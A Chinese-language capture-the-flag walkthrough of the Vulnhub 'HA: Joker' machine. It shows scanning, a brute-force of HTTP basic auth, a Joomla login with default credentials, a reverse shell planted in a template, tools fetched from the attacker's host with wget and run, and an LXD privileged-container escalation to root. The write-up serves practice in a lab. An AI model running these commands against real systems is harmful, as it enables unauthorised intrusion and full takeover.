Vulnhub之Joker靶机详细测试过程
Joker
作者: jason_huawen
靶机信息
名称:HA: Joker
地址:
https://www.vulnhub.com/entry/ha-joker,379/
识别目标主机IP地址
─(root💀kali)-[~/Vulnhub/Joker]
└─# netdiscover -i eth1 -r 192.168.187.0/24
Currently scanning: 192.168.187.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.187.1 00:50:56:c0:00:01 1 60 VMware, Inc.
192.168.187.140 00:0c:29:ae:a1:68 1 60 VMware, Inc.
192.168.187.254 00:50:56:fd:07:6a 1 60 VMware, Inc.
利用Kali Linux自带的netdiscover工具识别目标主机IP地址为192.168.187.140
NMAP扫描
┌──(root💀kali)-[~/Vulnhub/Joker]
└─# nmap -sS -sV -sC -p- 192.168.187.140 -oN nmap_full_scan 130 ⨯
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-23 22:58 EST
Nmap scan report for localhost (192.168.187.140)
Host is up (0.0015s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ad:20:1f:f4:33:1b:00:70:b3:85:cb:87:00:c4:f4:f7 (RSA)
| 256 1b:f9:a8:ec:fd:35:ec:fb:04:d5:ee:2a:a1:7a:4f:78 (ECDSA)
|_ 256 dc:d7:dd:6e:f6:71:1f:8c:2c:2c:a1:34:6d:29:99:20 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: HA: Joker
|_http-server-header: Apache/2.4.29 (Ubuntu)
8080/tcp open http Apache httpd 2.4.29
|_http-title: 401 Unauthorized
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Please enter the password.
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 00:0C:29:AE:A1:68 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.10 seconds
NMAP扫描结果表明目标主机有3个开放端口:22(ssh)、80(http)、8080(http)
获得Shell
┌──(root💀kali)-[~/Vulnhub/Joker]
└─# nikto -h http://192.168.187.140
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.187.140
+ Target Hostname: 192.168.187.140
+ Target Port: 80
+ Start Time: 2023-02-23 23:06:16 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /, inode: 1742, size: 5947314152e73, mtime: gzip
+ Allowed HTTP Methods: OPTIONS, HEAD, GET, POST
+ /phpinfo.php: Output from the phpinfo() function was found.
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3233: /phpinfo.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2023-02-23 23:07:27 (GMT-5) (71 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
nikto工具发现了/img目录,浏览该目录,发现有一张图片有点奇怪100.jpg,将其下载到Kali Linux本地
┌──(root💀kali)-[~/Vulnhub/Joker]
└─# steghide extract -sf 100.jpg
Enter passphrase:
┌──(root💀kali)-[~/Vulnhub/Joker]
└─# stegseek 100.jpg 130 ⨯
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Progress: 99.65% (133.0 MB)
[!] error: Could not find a valid passphrase.
┌──(root💀kali)-[~/Vulnhub/Joker]
└─# exiftool 100.jpg 1 ⨯
ExifTool Version Number : 12.41
File Name : 100.jpg
Directory : .
File Size : 79 KiB
File Modification Date/Time : 2023:02:23 23:07:10-05:00
File Access Date/Time : 2023:02:23 23:07:40-05:00
File Inode Change Date/Time : 2023:02:23 23:07:10-05:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Image Width : 3040
Image Height : 2036
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 3040x2036
Megapixels : 6.2
对图片分析,并没有发现有价值的信息。
┌──(root💀kali)-[~/Vulnhub/Joker]
└─# gobuster dir -u http://192.168.187.140 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.187.140
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php,html,sh,txt
[+] Timeout: 10s
===============================================================
2023/02/23 23:10:09 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 5954]
/img (Status: 301) [Size: 316] [--> http://192.168.187.140/img/]
/css (Status: 301) [Size: 316] [--> http://192.168.187.140/css/]
/secret.txt (Status: 200) [Size: 320]
/phpinfo.php (Status: 200) [Size: 94801]
/server-status (Status: 403) [Size: 280]
===============================================================
2023/02/23 23:11:50 Finished
===============================================================
┌──(root💀kali)-[~/Vulnhub/Joker]
└─# curl http://192.168.187.140/secret.txt
Batman hits Joker.
Joker: "Bats you may be a rock but you won't break me." (Laughs!)
Batman: "I will break you with this rock. You made a mistake now."
Joker: "This is one of your 100 poor jokes, when will you get a sense of humor bats! You are dumb as a rock."
Joker: "HA! HA! HA! HA! HA! HA! HA! HA! HA! HA! HA! HA!"
secret.txt文件不知道有什么用处?
这段secret.txt多次提到了rock,应该指的是rockyou.txt密码字典,而且它说one of you 100 poor jokes,应该是头100个单词
接下来用burpsuite破解8080端口的用户登录,假设用户名为joker,(注意:需要base64编码)
密码:hannah
成功通过网页基本认证,我们知道joomla CMS的管理员页面是/administrator,查询了一下网上,默认的管理员用户名和密码为joomla:joomla
成功进入joomla管理后台,到template文件目录处,修改index.php文件,将其替换为shell.php
成功替换后,点击preview按钮,得到反弹回来的shell
┌──(root💀kali)-[~/Vulnhub/Joker]
└─# sudo nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.187.130] from (UNKNOWN) [192.168.187.140] 33146
Linux ubuntu 4.15.0-55-generic #60-Ubuntu SMP Tue Jul 2 18:22:20 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
21:02:42 up 1:16, 0 users, load average: 0.00, 0.01, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data),115(lxd)
/bin/sh: 0: can't access tty; job control turned off
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@ubuntu:/$ cd /home
cd /home
www-data@ubuntu:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x 3 root root 4.0K Oct 8 2019 .
drwxr-xr-x 22 root root 4.0K Oct 8 2019 ..
drwxr-xr-x 4 joker joker 4.0K Oct 8 2019 joker
www-data@ubuntu:/home$ cd joker
cd joker
www-data@ubuntu:/home/joker$ ls -alh
ls -alh
total 36K
drwxr-xr-x 4 joker joker 4.0K Oct 8 2019 .
drwxr-xr-x 3 root root 4.0K Oct 8 2019 ..
-rw------- 1 joker joker 31 Oct 8 2019 .bash_history
-rw-r--r-- 1 joker joker 220 Oct 8 2019 .bash_logout
-rw-r--r-- 1 joker joker 3.7K Oct 8 2019 .bashrc
drwx------ 2 joker joker 4.0K Oct 8 2019 .cache
drwxrwxr-x 3 joker joker 4.0K Oct 8 2019 .local
-rw------- 1 root root 91 Oct 8 2019 .mysql_history
-rw-r--r-- 1 joker joker 807 Oct 8 2019 .profile
-rw-r--r-- 1 joker joker 0 Oct 8 2019 .sudo_as_admin_successful
www-data@ubuntu:/home/joker$ cd /var
cd /var
www-data@ubuntu:/var$ ls -alh
ls -alh
total 48K
drwxr-xr-x 12 root root 4.0K Oct 8 2019 .
drwxr-xr-x 22 root root 4.0K Oct 8 2019 ..
drwxr-xr-x 2 root root 4.0K Oct 8 2019 backups
drwxr-xr-x 12 root root 4.0K Oct 8 2019 cache
drwxr-xr-x 43 root root 4.0K Oct 8 2019 lib
drwxrwsr-x 2 root staff 4.0K Apr 24 2018 local
lrwxrwxrwx 1 root root 9 Oct 8 2019 lock -> /run/lock
drwxrwxr-x 10 root syslog 4.0K Feb 23 19:35 log
drwxrwsr-x 2 root mail 4.0K Aug 5 2019 mail
drwxr-xr-x 2 root root 4.0K Aug 5 2019 opt
lrwxrwxrwx 1 root root 4 Oct 8 2019 run -> /run
drwxr-xr-x 4 root root 4.0K Oct 8 2019 spool
drwxrwxrwt 2 root root 4.0K Feb 23 19:35 tmp
drwxrwxr-x 3 root www-data 4.0K Oct 8 2019 www
www-data@ubuntu:/var$ cd backups
cd backups
www-data@ubuntu:/var/backups$ ls -alh
ls -alh
total 32K
drwxr-xr-x 2 root root 4.0K Oct 8 2019 .
drwxr-xr-x 12 root root 4.0K Oct 8 2019 ..
-rw-r--r-- 1 root lxd 18K Oct 8 2019 apt.extended_states.0
-rw-r--r-- 1 root root 1.9K Oct 8 2019 apt.extended_states.1.gz
www-data@ubuntu:/var/backups$ cd ..
cd ..
www-data@ubuntu:/var$ cd www
cd www
www-data@ubuntu:/var/www$ ls -alh
ls -alh
total 12K
drwxrwxr-x 3 root www-data 4.0K Oct 8 2019 .
drwxr-xr-x 12 root root 4.0K Oct 8 2019 ..
drwxrwxr-x 4 root www-data 4.0K Oct 8 2019 html
www-data@ubuntu:/var/www$ cd html
cd html
www-data@ubuntu:/var/www/html$ ls -alh
ls -alh
total 36K
drwxrwxr-x 4 root www-data 4.0K Oct 8 2019 .
drwxrwxr-x 3 root www-data 4.0K Oct 8 2019 ..
-rwxrwxr-x 1 root www-data 225 Jun 10 2016 .htaccess
drwxr-xr-x 2 root root 4.0K Oct 9 2019 css
drwxr-xr-x 2 root root 4.0K Oct 8 2019 img
-rw-r--r-- 1 root root 5.9K Oct 8 2019 index.html
-rwxrwxr-x 1 root www-data 21 Oct 8 2019 phpinfo.php
-rw-r--r-- 1 root root 320 Oct 8 2019 secret.txt
www-data@ubuntu:/var/www/html$ cat .htaccess
cat .htaccess
<IfModule mod_rewrite.c>
RewriteEngine On
SetEnv HTTP_MOD_REWRITE On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ index.php?/$1 [L]
</IfModule>
www-data@ubuntu:/var/www/html$ cd /tmp
cd /tmp
www-data@ubuntu:/tmp$ wget http://192.168.187.130:8000/linpeas.sh
wget http://192.168.187.130:8000/linpeas.sh
--2023-02-23 21:04:48-- http://192.168.187.130:8000/linpeas.sh
Connecting to 192.168.187.130:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 765824 (748K) [text/x-sh]
Saving to: 'linpeas.sh'
linpeas.sh 100%[===================>] 747.88K --.-KB/s in 0.006s
2023-02-23 21:04:48 (113 MB/s) - 'linpeas.sh' saved [765824/765824]
www-data@ubuntu:/tmp$ chmod +x linpeas.sh
chmod +x linpeas.sh
www-data@ubuntu:/tmp$ ./linpeas.sh
./linpeas.sh
▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄ ▄▄▄ ▄▄▄▄▄ ▄▄▄
▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄ ▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▀▀▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀
▀▀▀▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▀▀
▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀
/---------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------|
| Become a Patreon : https://www.patreon.com/peass |
| Follow on Twitter : @carlospolopm |
| Respect on HTB : SirBroccoli |
|---------------------------------------------------------------------------|
| Tha
提权
从linpeas.sh脚本运行结果得知,可以利用lxd进行提权
www-data@ubuntu:/tmp$ wget http://192.168.187.130:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
<7.130:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
--2023-02-23 21:10:48-- http://192.168.187.130:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
Connecting to 192.168.187.130:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3259593 (3.1M) [application/gzip]
Saving to: 'alpine-v3.13-x86_64-20210218_0139.tar.gz'
alpine-v3.13-x86_64 100%[===================>] 3.11M --.-KB/s in 0.01s
2023-02-23 21:10:48 (252 MB/s) - 'alpine-v3.13-x86_64-20210218_0139.tar.gz' saved [3259593/3259593]
www-data@ubuntu:/tmp$ lxc image import alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage
<e-v3.13-x86_64-20210218_0139.tar.gz --alias myimage
www-data@ubuntu:/tmp$ sysadmin@kb-server:/tmp$ lxc init myimage ignite -c security.privileged=true
<lxc init myimage ignite -c security.privileged=true
bash: sysadmin@kb-server:/tmp$: No such file or directory
www-data@ubuntu:/tmp$ lxc image list
lxc image list
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCH | SIZE | UPLOAD DATE |
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| myimage | cd73881adaac | no | alpine v3.13 (20210218_01:39) | x86_64 | 3.11MB | Feb 24, 2023 at 5:11am (UTC) |
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
www-data@ubuntu:/tmp$ lxd init
lxd init
Would you like to use LXD clustering? (yes/no) [default=no]:
Do you want to configure a new storage pool? (yes/no) [default=yes]:
Name of the new storage pool [default=default]:
The requested storage pool "default" already exists. Please choose another name.
Name of the new storage pool [default=default]:
The requested storage pool "default" already exists. Please choose another name.
Name of the new storage pool [default=default]:
The requested storage pool "default" already exists. Please choose another name.
Name of the new storage pool [default=default]:
The requested storage pool "default" already exists. Please choose another name.
Name of the new storage pool [default=default]:
The requested storage pool "default" already exists. Please choose another name.
Name of the new storage pool [default=default]:
The requested storage pool "default" already exists. Please choose another name.
Name of the new storage pool [default=default]:
The requested storage pool "default" already exists. Please choose another name.
Name of the new storage pool [default=default]:
The requested storage pool "default" already exists. Please choose another name.
Name of the new storage pool [default=default]: jason
jason
Name of the storage backend to use (dir, zfs) [default=zfs]:
Create a new ZFS pool? (yes/no) [default=yes]:
Would you like to use an existing block device? (yes/no) [default=no]:
Size in GB of the new loop device (1GB minimum) [default=15GB]:
Would you like to connect to a MAAS server? (yes/no) [default=no]:
Would you like to create a new local network bridge? (yes/no) [default=yes]:
What should the new bridge be called? [default=lxdbr0]:
The requested network bridge "lxdbr0" already exists. Please choose another name.
What should the new bridge be called? [default=lxdbr0]:
The requested network bridge "lxdbr0" already exists. Please choose another name.
What should the new bridge be called? [default=lxdbr0]: testbr
testbr
What IPv4 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]:
What IPv6 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]:
Would you like LXD to be available over the network? (yes/no) [default=no]:
Would you like stale cached images to be updated automatically? (yes/no) [default=yes]
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]:
www-data@ubuntu:/tmp$ lxc init myimage ignite -c security.privileged=true
lxc init myimage ignite -c security.privileged=true
Creating ignite
www-data@ubuntu:/tmp$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
<ydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to ignite
www-data@ubuntu:/tmp$ lxc start ignite
lxc start ignite
www-data@ubuntu:/tmp$ lxc exec ignite /bin/sh
lxc exec ignite /bin/sh
~ # cd /mnt/root
cd /mnt/root
/mnt/root # ls -alh
ls -alh
total 947M
drwxr-xr-x 22 root root 4.0K Oct 8 2019 .
drwxr-xr-x 3 root root 3 Feb 24 05:14 ..
drwxr-xr-x 2 root root 4.0K Oct 8 2019 bin
drwxr-xr-x 3 root root 4.0K Oct 8 2019 boot
drwxr-xr-x 18 root root 3.8K Feb 24 03:35 dev
drwxr-xr-x 85 root root 4.0K Oct 8 2019 etc
drwxr-xr-x 3 root root 4.0K Oct 8 2019 home
lrwxrwxrwx 1 root root 33 Oct 8 2019 initrd.img -> boot/initrd.img-4.15.0-55-generic
lrwxrwxrwx 1 root root 33 Oct 8 2019 initrd.img.old -> boot/initrd.img-4.15.0-55-generic
drwxr-xr-x 20 root root 4.0K Oct 8 2019 lib
drwxr-xr-x 2 root root 4.0K Oct 8 2019 lib64
drwx------ 2 root root 16.0K Oct 8 2019 lost+found
drwxr-xr-x 4 root root 4.0K Oct 8 2019 media
drwxr-xr-x 2 root root 4.0K Aug 5 2019 mnt
drwxr-xr-x 3 root root 4.0K Oct 8 2019 opt
dr-xr-xr-x 264 root root 0 Feb 24 03:35 proc
drwx------ 3 root root 4.0K Oct 8 2019 root
drwxr-xr-x 23 root root 700 Feb 24 05:13 run
drwxr-xr-x 2 root root 4.0K Oct 8 2019 sbin
drwxr-xr-x 2 root root 4.0K Aug 5 2019 srv
-rw------- 1 root root 947.2M Oct 8 2019 swapfile
dr-xr-xr-x 13 root root 0 Feb 24 03:35 sys
drwxrwxrwt 12 root root 4.0K Feb 24 05:09 tmp
drwxr-xr-x 10 root root 4.0K Oct 8 2019 usr
drwxr-xr-x 12 root root 4.0K Oct 8 2019 var
lrwxrwxrwx 1 root root 30 Oct 8 2019 vmlinuz -> boot/vmlinuz-4.15.0-55-generic
lrwxrwxrwx 1 root root 30 Oct 8 2019 vmlinuz.old -> boot/vmlinuz-4.15.0-55-generic
/mnt/root # cd root
cd root
/mnt/root/root # ls -alh
ls -alh
total 24K
drwx------ 3 root root 4.0K Oct 8 2019 .
drwxr-xr-x 22 root root 4.0K Oct 8 2019 ..
-rw-r--r-- 1 root root 3.0K Apr 9 2018 .bashrc
drwxr-xr-x 3 root root 4.0K Oct 8 2019 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 1003 Oct 8 2019 final.txt
/mnt/root/root # cat final.txt
cat final.txt
██╗ ██████╗ ██╗ ██╗███████╗██████╗
██║██╔═══██╗██║ ██╔╝██╔════╝██╔══██╗
██║██║ ██║█████╔╝ █████╗ ██████╔╝
██ ██║██║ ██║██╔═██╗ ██╔══╝ ██╔══██╗
╚█████╔╝╚██████╔╝██║ ██╗███████╗██║ ██║
╚════╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝
!! Congrats you have finished this task !!
Contact us here:
Hacking Articles : https://twitter.com/rajchandel/
Aarti Singh: https://in.linkedin.com/in/aarti-singh-353698114
提权成功,并拿到root flag
经验教训
-
本靶机最大的困难在于对8080端口网页基本认证的破解,首先需要假设用户名为joker,而且字典需要理解secret.txt文件内容,产生只有100个单词的字典,然后利用burpsuite intruder进行破解,而且需要对payload进行base64编码: joker:$password$
-
joomla的管理员默认目录为/administrator, 默认用户名与密码为joomla:joomla